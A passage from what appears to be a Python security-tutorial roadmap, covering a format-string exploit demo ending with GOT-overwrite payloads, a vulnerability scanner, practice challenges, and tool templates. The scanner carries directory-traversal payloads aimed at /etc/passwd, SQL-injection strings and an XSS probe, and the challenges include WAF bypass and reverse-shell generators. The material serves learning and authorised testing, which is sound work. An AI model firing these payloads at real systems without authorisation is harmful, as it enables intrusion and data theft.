# 2. Write to arbitrary address
write_payload = self.write_address(0x08049000, 0x41414141, 4)
print(f"Arbitrary Write Payload: {write_payload}")
# 3. GOT overwrite
got_payload = self.overwrite_got_entry(0x0804A010, 0x08048500, 4)
print(f"GOT Overwrite Payload: {got_payload}")
if __name__ == "__main__":
exploit = FormatStringExploit()
exploit.demonstrate_attacks()
Phase 11 — Advanced Automation & Frameworks
1. Custom Vulnerability Assessment Framework
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
#!/usr/bin/env python3
"""
Comprehensive Vulnerability Assessment Framework
Modular design for extensible security testing
"""
import json
import threading
import argparse
from datetime import datetime
from abc import ABC, abstractmethod
class VulnerabilityScanner(ABC):
"""Abstract base class for vulnerability scanners"""
@abstractmethod
def scan(self, target):
pass
@abstractmethod
def get_name(self):
pass
class NetworkScanner(VulnerabilityScanner):
"""Network-based vulnerability scanner"""
def get_name(self):
return "Network Scanner"
def scan(self, target):
"""Scan for network vulnerabilities"""
vulnerabilities = []
# Port scan
open_ports = self.port_scan(target)
for port_info in open_ports:
port = port_info['port']
banner = port_info.get('banner', '')
# Check for known vulnerabilities
if port == 22 and 'OpenSSH_7.4' in banner:
vulnerabilities.append({
'type': 'SSH_VERSION_VULN',
'severity': 'Medium',
'port': port,
'description': 'Potentially vulnerable SSH version',
'cve': 'CVE-2018-15473'
})
elif port == 21 and 'vsftpd 2.3.4' in banner:
vulnerabilities.append({
'type': 'FTP_BACKDOOR',
'severity': 'Critical',
'port': port,
'description': 'vsftpd 2.3.4 backdoor vulnerability',
'cve': 'CVE-2011-2523'
})
return vulnerabilities
def port_scan(self, target):
"""Quick port scan implementation"""
# Reuse our previous PortScanner class
scanner = PortScanner(target, threads=50)
return scanner.scan_range(1, 1000)
class WebScanner(VulnerabilityScanner):
"""Web application vulnerability scanner"""
def get_name(self):
return "Web Application Scanner"
def scan(self, target):
"""Scan for web vulnerabilities"""
vulnerabilities = []
# URL validation
if not target.startswith('http'):
target = f"http://{target}"
# Directory traversal test
traversal_vulns = self.test_directory_traversal(target)
vulnerabilities.extend(traversal_vulns)
# SQL injection test
sqli_vulns = self.test_sql_injection(target)
vulnerabilities.extend(sqli_vulns)
# XSS test
xss_vulns = self.test_xss(target)
vulnerabilities.extend(xss_vulns)
return vulnerabilities
def test_directory_traversal(self, target):
"""Test for directory traversal vulnerabilities"""
vulnerabilities = []
payloads = [
'../../../etc/passwd',
'..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
'....//....//....//etc/passwd'
]
for payload in payloads:
test_url = f"{target}/?file={payload}"
try:
response = requests.get(test_url, timeout=5)
if 'root:' in response.text or 'localhost' in response.text:
vulnerabilities.append({
'type': 'DIRECTORY_TRAVERSAL',
'severity': 'High',
'url': test_url,
'description': 'Directory traversal vulnerability detected',
'payload': payload
})
except:
continue
return vulnerabilities
def test_sql_injection(self, target):
"""Test for SQL injection vulnerabilities"""
vulnerabilities = []
payloads = [
"' OR '1'='1",
"1' UNION SELECT version()--",
"1'; WAITFOR DELAY '0:0:5'--"
]
# This would need form discovery first
# Simplified implementation
return vulnerabilities
def test_xss(self, target):
"""Test for XSS vulnerabilities"""
vulnerabilities = []
payload = "<script>alert('XSS')</script>"
# Test common parameters
params = ['q', 'search', 'query', 'name']
for param in params:
test_url = f"{target}/?{param}={payload}"
try:
response = requests.get(test_url, timeout=5)
if payload in response.text:
vulnerabilities.append({
'type': 'XSS',
'severity': 'Medium',
'url': test_url,
'description': 'Reflected XSS vulnerability',
'parameter': param
})
except:
continue
return vulnerabilities
class VulnerabilityAssessment:
"""Main vulnerability assessment framework"""
def __init__(self):
self.scanners = [
NetworkScanner(),
WebScanner()
]
self.results = {
'target': '',
'scan_time': '',
'vulnerabilities': [],
'summary': {}
}
def run_assessment(self, target):
"""Run complete vulnerability assessment"""
print(f"[+] Starting vulnerability assessment on {target}")
self.results['target'] = target
self.results['scan_time'] = datetime.now().isoformat()
all_vulnerabilities = []
for scanner in self.scanners:
print(f"[+] Running {scanner.get_name()}")
try:
vulns = scanner.scan(target)
all_vulnerabilities.extend(vulns)
print(f" Found {len(vulns)} vulnerabilities")
except Exception as e:
print(f" Error in {scanner.get_name()}: {e}")
self.results['vulnerabilities'] = all_vulnerabilities
self.generate_summary()
return self.results
def generate_summary(self):
"""Generate vulnerability summary"""
total = len(self.results['vulnerabilities'])
severity_count = {'Critical': 0, 'High': 0, 'Medium': 0, 'Low': 0}
vuln_types = {}
for vuln in self.results['vulnerabilities']:
severity = vuln.get('severity', 'Unknown')
if severity in severity_count:
severity_count[severity] += 1
vuln_type = vuln.get('type', 'Unknown')
vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
self.results['summary'] = {
'total_vulnerabilities': total,
'severity_breakdown': severity_count,
'vulnerability_types': vuln_types
}
def generate_report(self, format='json'):
"""Generate assessment report"""
if format == 'json':
return json.dumps(self.results, indent=2)
elif format == 'text':
report = f"Vulnerability Assessment Report\n"
report += f"{'='*50}\n"
report += f"Target: {self.results['target']}\n"
report += f"Scan Time: {self.results['scan_time']}\n"
report += f"Total Vulnerabilities: {self.results['summary']['total_vulnerabilities']}\n\n"
report += "Severity Breakdown:\n"
for severity, count in self.results['summary']['severity_breakdown'].items():
if count > 0:
report += f" {severity}: {count}\n"
report += f"\nDetailed Findings:\n"
report += f"{'-'*30}\n"
for vuln in self.results['vulnerabilities']:
report += f"[{vuln.get('severity', 'Unknown')}] {vuln.get('type', 'Unknown')}\n"
report += f" Description: {vuln.get('description', 'N/A')}\n"
if 'cve' in vuln:
report += f" CVE: {vuln['cve']}\n"
report += f" Details: {vuln}\n\n"
return report
else:
raise ValueError("Unsupported format. Use 'json' or 'text'")
def save_report(self, filename, format='json'):
"""Save report to file"""
report = self.generate_report(format)
with open(filename, 'w') as f:
f.write(report)
print(f"[+] Report saved to {filename}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Vulnerability Assessment Framework")
parser.add_argument("target", help="Target to scan (IP or domain)")
parser.add_argument("-o", "--output", help="Output file", default="vuln_report.json")
parser.add_argument("-f", "--format", choices=['json', 'text'], default='json', help="Report format")
args = parser.parse_args()
assessment = VulnerabilityAssessment()
results = assessment.run_assessment(args.target)
assessment.save_report(args.output, args.format)
print(f"\n[+] Assessment complete!")
print(f"[+] Found {results['summary']['total_vulnerabilities']} vulnerabilities")
print(f"[+] Report saved to {args.output}")
Phase 12 — Daily Practice & Mindset
The Hacker’s Python Workout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
#!/usr/bin/env python3
"""
Daily Python Challenges for Hackers
Build one skill every day
"""
import random
import string
import hashlib
import base64
class DailyChallenge:
def __init__(self):
self.challenges = [
self.network_challenge,
self.crypto_challenge,
self.web_challenge,
self.reverse_challenge,
self.forensics_challenge
]
def get_random_challenge(self):
"""Get a random daily challenge"""
return random.choice(self.challenges)()
def network_challenge(self):
"""Network-focused challenge"""
challenges = [
"Write a script to detect hosts with SSH keys in authorized_keys",
"Create a TCP packet sniffer that detects SYN floods",
"Build a DNS zone transfer checker",
"Implement a simple HTTP proxy that logs all requests",
"Write a script to detect ARP spoofing attacks"
]
return random.choice(challenges)
def crypto_challenge(self):
"""Cryptography challenge"""
challenges = [
"Implement a Caesar cipher cracker using frequency analysis",
"Write a script to detect weak passwords using entropy calculation",
"Create a hash collision detector for MD5",
"Build a simple steganography tool for images",
"Implement RSA key generation and signature verification"
]
return random.choice(challenges)
def web_challenge(self):
"""Web security challenge"""
challenges = [
"Build a SQL injection payload generator",
"Create a web crawler that detects admin panels",
"Write a script to bypass simple WAF filters",
"Implement a cookie hijacking simulator",
"Build a CSRF token analyzer"
]
return random.choice(challenges)
def reverse_challenge(self):
"""Reverse engineering challenge"""
challenges = [
"Write a simple PE file parser",
"Create a string extractor for binary files",
"Build a basic disassembler for x86 instructions",
"Implement a hex dump analyzer",
"Write a script to detect packed executables"
]
return random.choice(challenges)
def forensics_challenge(self):
"""Digital forensics challenge"""
challenges = [
"Build a deleted file recovery simulator",
"Create a network packet timeline analyzer",
"Write a script to extract metadata from images",
"Implement a log correlation tool",
"Build a memory dump string searcher"
]
return random.choice(challenges)
# Example implementation of one challenge
class CaesarCipherCracker:
"""Example solution for crypto challenge"""
def __init__(self):
# English letter frequency
self.freq_english = {
'a': 8.12, 'b': 1.49, 'c': 2.78, 'd': 4.25, 'e': 12.02,
'f': 2.23, 'g': 2.02, 'h': 6.09, 'i': 6.97, 'j': 0.15,
'k': 0.77, 'l': 4.03, 'm': 2.41, 'n': 6.75, 'o': 7.51,
'p': 1.93, 'q': 0.10, 'r': 5.99, 's': 6.33, 't': 9.06,
'u': 2.76, 'v': 0.98, 'w': 2.36, 'x': 0.15, 'y': 1.97,
'z': 0.07
}
def caesar_decrypt(self, ciphertext, shift):
"""Decrypt Caesar cipher with given shift"""
result = ""
for char in ciphertext.lower():
if char.isalpha():
shifted = chr((ord(char) - ord('a') - shift) % 26 + ord('a'))
result += shifted
else:
result += char
return result
def calculate_fitness(self, text):
"""Calculate fitness score based on English frequency"""
text = text.lower()
score = 0
text_length = sum(1 for c in text if c.isalpha())
if text_length == 0:
return 0
for char in text:
if char in self.freq_english:
score += self.freq_english[char]
return score / text_length
def crack_caesar(self, ciphertext):
"""Crack Caesar cipher using frequency analysis"""
best_shift = 0
best_score = 0
best_plaintext = ""
for shift in range(26):
plaintext = self.caesar_decrypt(ciphertext, shift)
score = self.calculate_fitness(plaintext)
if score > best_score:
best_score = score
best_shift = shift
best_plaintext = plaintext
return {
'shift': best_shift,
'plaintext': best_plaintext,
'confidence': best_score
}
if __name__ == "__main__":
# Daily challenge
challenge_gen = DailyChallenge()
today_challenge = challenge_gen.get_random_challenge()
print(f"🎯 Today's Challenge: {today_challenge}")
# Example: Test Caesar cipher cracker
print("\n🔐 Example: Caesar Cipher Cracker")
cracker = CaesarCipherCracker()
encrypted = "wklv lv d vhfuhw phvvdjh"
result = cracker.crack_caesar(encrypted)
print(f"Encrypted: {encrypted}")
print(f"Decrypted: {result['plaintext']}")
print(f"Shift: {result['shift']}")
print(f"Confidence: {result['confidence']:.2f}")
Essential Hacker Habits
Daily Python Rituals
1
2
3
4
5
6
7
8
# Morning warmup
python3 -c "import this" # Read the Zen of Python
# Practice one-liners
python3 -c "print([x for x in range(256) if chr(x).isprintable()])"
# Read someone else's exploit code
curl -s https://api.github.com/search/repositories?q=python+exploit | python3 -m json.tool
Weekly Projects Checklist
- Build a new reconnaissance tool
- Solve 3 coding challenges on HackerRank/LeetCode
- Read and understand one CVE exploit
- Refactor an old script for better performance
- Contribute to an open-source security tool
“Code every day. Even 30 minutes builds mastery over months.”
The Hacker’s Python Library
Must-Have Modules
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Network & HTTP
import socket, requests, urllib3, scapy
from concurrent.futures import ThreadPoolExecutor
# System & Process
import subprocess, os, sys, threading
import multiprocessing, signal, time
# Data & Parsing
import json, csv, xml.etree.ElementTree as ET
import re, base64, hashlib
# Crypto & Security
from Crypto.Cipher import AES, DES, RSA
from Crypto.Random import get_random_bytes
# Web & HTML
from bs4 import BeautifulSoup
import selenium, lxml
# Database
import sqlite3, pymongo
Quick Installation Script
1
2
3
4
5
6
7
8
9
#!/bin/bash
echo "🐍 Setting up Python Hacker Environment"
# Essential packages
pip3 install requests beautifulsoup4 scapy pycryptodome
pip3 install paramiko selenium colorama tqdm
pip3 install python-nmap impacket-py3
echo "✅ Python hacker environment ready!"
Final Words: Your Python Journey
"Python isn't just code — it's how hackers think. Master the language, master the craft."
The Path Forward
Start Small, Think Big
- Begin with simple scripts
- Gradually add complexity
- Always solve real problems
Read Code Daily
- Study exploit repositories
- Analyze security tools
- Learn from others’ mistakes
Build Your Arsenal
- One script per week minimum
- Document everything
- Share your knowledge
Never Stop Learning
- Python evolves, stay current
- New attack vectors emerge daily
- Adapt your tools accordingly
TL;DR — Python Hacker’s Roadmap
Phase 1: Foundations (Weeks 1-4)
- Master basic syntax, data types, control flow
- Understand functions, error handling, file I/O
- Build simple port scanner and HTTP client
- Practice with 20+ small scripts
Phase 2: Security Applications (Weeks 5-8)
- Network programming with sockets
- Web scraping and form interaction
- Basic cryptography implementation
- Build directory fuzzer and vulnerability scanner
Phase 3: Advanced Exploitation (Weeks 9-12)
- Buffer overflow exploit development
- Format string vulnerability exploitation
- Reverse engineering helpers
- Advanced payload generation
Phase 4: Framework Development (Weeks 13-16)
- Modular security framework design
- Multi-threaded scanning engines
- Automated report generation
- Integration with existing tools
Phase 5: Mastery & Innovation (Ongoing)
- Contribute to open-source projects
- Develop novel attack techniques
- Build comprehensive toolsuites
- Mentor other aspiring hackers
Your Daily Python Practice
Morning Routine (15 minutes)
1
2
3
4
5
6
7
8
# Read this every day
import this
# Practice one-liner
python3 -c "import socket; print([socket.gethostbyaddr(f'8.8.8.{i}')[0] for i in range(1,10) if True])"
# Quick network check
python3 -c "import requests; print(requests.get('http://httpbin.org/ip').json())"
Evening Challenge (30 minutes)
- Implement one security concept in code
- Read one exploit from ExploitDB
- Refactor an old script for better performance
- Write documentation for your tools
Essential Resources for Continuous Learning
📚 Must-Read Documentation
🔧 Practice Platforms
🎯 Project Ideas for Skill Building
Beginner Projects
- Password strength checker
- Hash cracking tool
- Simple keylogger detector
- Network device discoverer
Intermediate Projects
- Web vulnerability scanner
- Payload encoder/decoder
- Log analysis framework
- Reverse shell generator
Advanced Projects
- Custom malware analysis sandbox
- Automated penetration testing framework
- Machine learning threat detector
- Blockchain security auditor
The Hacker’s Python Mindset
Think Like a Problem Solver
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def hacker_mindset(problem):
"""The hacker approach to any problem"""
# 1. Understand the system
system_analysis = analyze_target(problem)
# 2. Find the weakest link
vulnerabilities = discover_weaknesses(system_analysis)
# 3. Craft precise tools
exploits = build_targeted_tools(vulnerabilities)
# 4. Test and iterate
results = test_and_improve(exploits)
# 5. Document and share
knowledge = document_findings(results)
return knowledge
def analyze_target(target):
"""Break down the problem into components"""
return {
'entry_points': find_entry_points(target),
'trust_boundaries': map_trust_relationships(target),
'assumptions': identify_assumptions(target)
}
Code with Security in Mind
- Validate all inputs — Never trust user data
- Handle errors gracefully — Fail securely, not openly
- Log everything — Information is your weapon
- Think like an attacker — How would you break this?
Advanced Python Techniques for Hackers
1. Metaclasses for Dynamic Tool Generation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
class ExploitMeta(type):
"""Metaclass for automatic exploit registration"""
def __new__(cls, name, bases, attrs):
new_class = super().__new__(cls, name, bases, attrs)
if hasattr(new_class, 'cve_id'):
ExploitRegistry.register(new_class.cve_id, new_class)
return new_class
class BaseExploit(metaclass=ExploitMeta):
"""Base class for all exploits"""
def __init__(self, target):
self.target = target
self.payload = None
def generate_payload(self):
raise NotImplementedError
def exploit(self):
raise NotImplementedError
2. Decorators for Logging and Timing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import functools
import time
import logging
def log_attacks(func):
"""Log all attack attempts"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
logging.info(f"Starting {func.__name__} on {args[0] if args else 'unknown target'}")
start_time = time.time()
try:
result = func(*args, **kwargs)
elapsed = time.time() - start_time
logging.info(f"{func.__name__} completed in {elapsed:.2f}s")
return result
except Exception as e:
logging.error(f"{func.__name__} failed: {e}")
raise
return wrapper
@log_attacks
def sql_injection_test(url, payload):
"""SQL injection testing with automatic logging"""
response = requests.get(f"{url}?id={payload}")
return 'error' in response.text.lower()
3. Context Managers for Resource Safety
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from contextlib import contextmanager
import socket
@contextmanager
def tcp_connection(host, port, timeout=5):
"""Safe TCP connection context manager"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
try:
sock.connect((host, port))
yield sock
finally:
sock.close()
# Usage
with tcp_connection('example.com', 80) as sock:
sock.send(b'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n')
response = sock.recv(1024)
print(response.decode())
Performance Optimization for Security Tools
1. Asynchronous Programming
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import asyncio
import aiohttp
import time
async def check_url(session, url):
"""Asynchronous URL checker"""
try:
async with session.get(url, timeout=5) as response:
return {
'url': url,
'status': response.status,
'size': len(await response.read())
}
except Exception as e:
return {'url': url, 'error': str(e)}
async def mass_url_check(urls):
"""Check multiple URLs concurrently"""
async with aiohttp.ClientSession() as session:
tasks = [check_url(session, url) for url in urls]
results = await asyncio.gather(*tasks)
return results
# Example usage
urls = [f"http://example.com/{i}" for i in range(100)]
results = asyncio.run(mass_url_check(urls))
2. Memory-Efficient Data Processing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def process_large_wordlist(filename):
"""Process wordlist without loading everything into memory"""
with open(filename, 'r') as f:
for line_num, line in enumerate(f, 1):
word = line.strip()
if not word or word.startswith('#'):
continue
# Process each word immediately
yield {
'line': line_num,
'word': word,
'length': len(word),
'entropy': calculate_entropy(word)
}
# Usage - memory efficient
for word_info in process_large_wordlist('rockyou.txt'):
if word_info['entropy'] > 3.0:
print(f"Strong word: {word_info['word']}")
3. Caching for Performance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from functools import lru_cache
import hashlib
@lru_cache(maxsize=1000)
def hash_password(password, salt):
"""Cached password hashing for repeated operations"""
return hashlib.pbkdf2_hmac('sha256',
password.encode(),
salt.encode(),
100000).hex()
@lru_cache(maxsize=500)
def resolve_hostname(hostname):
"""Cached DNS resolution"""
try:
return socket.gethostbyname(hostname)
except socket.gaierror:
return None
Building Production-Ready Security Tools
1. Configuration Management
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import configparser
import os
from dataclasses import dataclass
@dataclass
class ScannerConfig:
"""Configuration for security scanner"""
max_threads: int = 50
timeout: int = 5
user_agent: str = "Mozilla/5.0 (Security Scanner)"
wordlist_path: str = "/usr/share/wordlists/common.txt"
output_format: str = "json"
verbose: bool = False
def load_config(config_file="scanner.conf"):
"""Load configuration from file"""
config = configparser.ConfigParser()
if os.path.exists(config_file):
config.read(config_file)
return ScannerConfig(
max_threads=config.getint('scanner', 'max_threads', fallback=50),
timeout=config.getint('scanner', 'timeout', fallback=5),
user_agent=config.get('scanner', 'user_agent', fallback="Mozilla/5.0"),
wordlist_path=config.get('scanner', 'wordlist_path', fallback="/usr/share/wordlists/common.txt"),
output_format=config.get('scanner', 'output_format', fallback="json"),
verbose=config.getboolean('scanner', 'verbose', fallback=False)
)
return ScannerConfig() # Default configuration
2. Comprehensive Logging
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import logging
import sys
from datetime import datetime
class SecurityLogger:
"""Centralized logging for security tools"""
def __init__(self, name, log_file=None, verbose=False):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging.DEBUG if verbose else logging.INFO)
# Console handler
console_handler = logging.StreamHandler(sys.stdout)
console_formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%H:%M:%S'
)
console_handler.setFormatter(console_formatter)
self.logger.addHandler(console_handler)
# File handler
if log_file:
file_handler = logging.FileHandler(log_file)
file_formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(name)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
file_handler.setFormatter(file_formatter)
self.logger.addHandler(file_handler)
def info(self, message):
self.logger.info(message)
def error(self, message):
self.logger.error(message)
def warning(self, message):
self.logger.warning(message)
def debug(self, message):
self.logger.debug(message)
def attack_attempt(self, target, attack_type, payload=None):
"""Log attack attempts specifically"""
msg = f"ATTACK: {attack_type} on {target}"
if payload:
msg += f" with payload: {payload[:50]}..."
self.logger.info(msg)
def vulnerability_found(self, target, vuln_type, severity):
"""Log discovered vulnerabilities"""
self.logger.warning(f"VULN: {severity} {vuln_type} found on {target}")
3. Error Handling and Recovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import time
import random
from functools import wraps
def retry_on_failure(max_attempts=3, delay=1, backoff_factor=2):
"""Decorator for automatic retry with exponential backoff"""
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
attempt = 1
current_delay = delay
while attempt <= max_attempts:
try:
return func(*args, **kwargs)
except Exception as e:
if attempt == max_attempts:
raise e
print(f"Attempt {attempt} failed: {e}")
print(f"Retrying in {current_delay} seconds...")
time.sleep(current_delay + random.uniform(0, 1))
current_delay *= backoff_factor
attempt += 1
return wrapper
return decorator
@retry_on_failure(max_attempts=3, delay=2)
def unreliable_network_operation(target):
"""Network operation that might fail"""
response = requests.get(target, timeout=5)
if response.status_code != 200:
raise Exception(f"HTTP {response.status_code}")
return response.text
The Professional Hacker’s Workflow
Complete Tool Template
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3
"""
Professional Security Tool Template
Author: jusot99
Version: 1.0
"""
import argparse
import sys
import json
from datetime import datetime
import signal
class ProfessionalSecurityTool:
"""Template for professional security tools"""
def __init__(self, config):
self.config = config
self.logger = SecurityLogger("SecurityTool", config.log_file, config.verbose)
self.results = []
self.interrupted = False
# Handle Ctrl+C gracefully
signal.signal(signal.SIGINT, self.signal_handler)
def signal_handler(self, signum, frame):
"""Handle interruption gracefully"""
self.logger.info("Interruption received, cleaning up...")
self.interrupted = True
self.cleanup()
sys.exit(0)
def cleanup(self):
"""Cleanup resources before exit"""
if self.results:
self.logger.info("Saving partial results...")
self.save_results("partial_results.json")
def run(self, targets):
"""Main execution method"""
self.logger.info(f"Starting scan of {len(targets)} targets")
for target in targets:
if self.interrupted:
break
try:
result = self.scan_target(target)
self.results.append(result)
self.logger.info(f"Completed scan of {target}")
except Exception as e:
self.logger.error(f"Failed to scan {target}: {e}")
return self.results
def scan_target(self, target):
"""Override this method in subclasses"""
raise NotImplementedError("Subclasses must implement scan_target")
def save_results(self, filename):
"""Save results to file"""
output = {
'timestamp': datetime.now().isoformat(),
'tool_version': "1.0",
'results': self.results
}
with open(filename, 'w') as f:
json.dump(output, f, indent=2)
self.logger.info(f"Results saved to {filename}")
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(description="Professional Security Tool")
parser.add_argument("targets", nargs="+", help="Targets to scan")
parser.add_argument("-c", "--config", help="Configuration file")
parser.add_argument("-o", "--output", default="results.json", help="Output file")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
parser.add_argument("--log-file", help="Log file path")
args = parser.parse_args()
# Load configuration
config = load_config(args.config) if args.config else ScannerConfig()
config.verbose = args.verbose
config.log_file = args.log_file
# Run the tool
tool = ProfessionalSecurityTool(config)
results = tool.run(args.targets)
tool.save_results(args.output)
print(f"\nScan complete! Processed {len(args.targets)} targets")
print(f"Results saved to {args.output}")
if __name__ == "__main__":
main()
Master These Python Concepts
Essential Skills Checklist
Core Language Features
- List/Dict/Set comprehensions
- Generators and iterators
- Context managers
- Decorators
- Exception handling
- Threading and multiprocessing
- Regular expressions
- File I/O operations
Security-Specific Skills
- Socket programming
- HTTP requests/responses
- Binary data manipulation
- Cryptographic operations
- Process interaction
- System monitoring
- Network packet crafting
- Web scraping and parsing
Advanced Techniques
- Asynchronous programming
- Metaclasses
- Memory optimization
- Performance profiling
- Testing and debugging
- Documentation
- Packaging and distribution
Your Python Hacker Manifesto
"Code is not just instructions for computers it's a way of thinking about problems. Master Python, and you master the art of systematic problem-solving."
The Five Principles
Automate Everything
- If you do it twice, script it
- If you script it, optimize it
- If you optimize it, share it
Security First
- Validate all inputs
- Handle errors gracefully
- Log everything
- Trust nothing
Continuous Learning
- Read code daily
- Build something new weekly
- Contribute monthly
- Teach others
Elegant Solutions
- Simple is better than complex
- Readable code is maintainable code
- Performance matters, but correctness comes first
Ethical Use
- Use your skills responsibly
- Protect the innocent
- Share knowledge
- Build a better, more secure world
Beyond This Guide
Next Steps in Your Journey
Contribute to Open Source
- Fix bugs in existing tools
- Add features to security frameworks
- Create new innovative solutions
Build Your Portfolio
- GitHub with quality projects
- Blog about your discoveries
- Speak at conferences
- Mentor newcomers
Stay Current
- Follow security research
- Learn new Python features
- Adapt to emerging threats
- Network with professionals
Remember
Python is not just a programming language — it’s your gateway to understanding systems, networks, and security at a fundamental level. Every line of code you write makes you a better hacker, a better problem solver, and a better professional.
"The best hackers don't just use tools — they build them. And the best tools are built with Python."
Start coding. Start thinking. Start hacking.
Happy Hacking! 🐍🔐